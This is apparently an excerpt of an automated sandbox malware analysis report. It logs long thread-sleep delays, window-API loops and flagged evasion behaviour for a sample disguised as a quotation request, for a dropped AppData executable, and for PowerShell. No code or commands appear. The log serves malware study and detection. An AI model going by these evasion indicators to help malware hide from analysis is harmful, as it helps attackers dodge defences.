Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 597359 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 597250 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 597139 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 597031 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 596922 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 596812 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 596703 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 596594 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 596484 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 596375 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 596265 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 596156 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 596047 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 595937 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 595828 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 595719 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 595609 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 595500 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 595390 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 595281 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 595172 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 595062 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 594953 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 594843 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 594720 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 594594 Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 599891
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 599672
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 599541
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 599437
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 599218
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 599109
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 599000
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 598890
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 598781
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 598672
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 598560
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 598453
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 598344
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 598219
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 598109
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 598000
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 597885
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 597781
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 597672
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 597562
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 597453
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 597344
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 597232
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 597125
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 597016
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 596891
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 596766
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 596656
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 596546
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 596437
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 596328
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 596219
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 596109
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 596000
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 595891
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 595766
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 595641
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 595531
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 595422
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 595312
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 595203
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 595094
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 594984
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 594875
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 594765
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 594656
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 594547
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4920 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5746 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 664 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Window / User API: threadDelayed 1814 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Window / User API: threadDelayed 8049 Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Window / User API: threadDelayed 1284
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Window / User API: threadDelayed 8573
Source: C:\Windows\System32\wbem\WMIADAP.exe Window / User API: threadDelayed 1317
Source: C:\Windows\System32\wbem\WMIADAP.exe Window / User API: threadDelayed 1251
Source: C:\Windows\System32\wbem\WMIADAP.exe Window / User API: threadDelayed 851
Source: C:\Windows\System32\wbem\WMIADAP.exe Window / User API: threadDelayed 1244
Source: C:\Windows\System32\wbem\WMIADAP.exe Window / User API: threadDelayed 1094
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 3480 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6732 Thread sleep count: 4920 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7300 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 368 Thread sleep count: 216 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7224 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7332 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7256 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -27670116110564310s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7564 Thread sleep count: 1814 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -599874s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7564 Thread sleep count: 8049 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -599765s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -599655s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -599547s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -599437s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -599326s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -599219s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -599107s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -599000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -598890s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -598781s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -598671s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -598562s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -598453s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -598344s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -598234s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -598125s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -598015s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -597906s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -597797s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -597687s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -597578s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -597469s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -597359s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -597250s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -597139s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -597031s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -596922s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -596812s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -596703s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -596594s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -596484s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -596375s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -596265s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -596156s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -596047s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -595937s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -595828s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -595719s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -595609s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -595500s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -595390s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -595281s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -595172s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -595062s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -594953s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -594843s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -594720s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -594594s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7480 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep count: 31 > 30
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -28592453314249787s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7736 Thread sleep count: 1284 > 30
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -599891s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7736 Thread sleep count: 8573 > 30
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -599781s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -599672s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -599541s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -599437s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -599328s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -599218s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -599109s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -599000s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -598890s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -598781s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -598672s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -598560s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -598453s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -598344s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -598219s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -598109s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -598000s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -597885s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -597781s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -597672s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -597562s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -597453s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -597344s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -597232s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -597125s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -597016s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -596891s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -596766s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -596656s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -596546s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -596437s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -596328s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -596219s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -596109s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -596000s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -595891s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -595766s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -595641s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -595531s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -595422s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -595312s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -595203s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -595094s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -594984s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -594875s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -594765s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -594656s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -594547s >= -30000s
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 6580 Thread sleep count: 1317 > 30
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 6580 Thread sleep count: 1251 > 30
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 6580 Thread sleep count: 851 > 30
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 6580 Thread sleep count: 1244 > 30
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 6580 Thread sleep count: 1094 > 30
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 599874 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 599765 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 599655 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 599547 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 599437 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 599326 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 599219 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 599107 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 599000 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 598890 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 598781 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 598671 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 598562 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 598453 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 598344 Jump to behavior
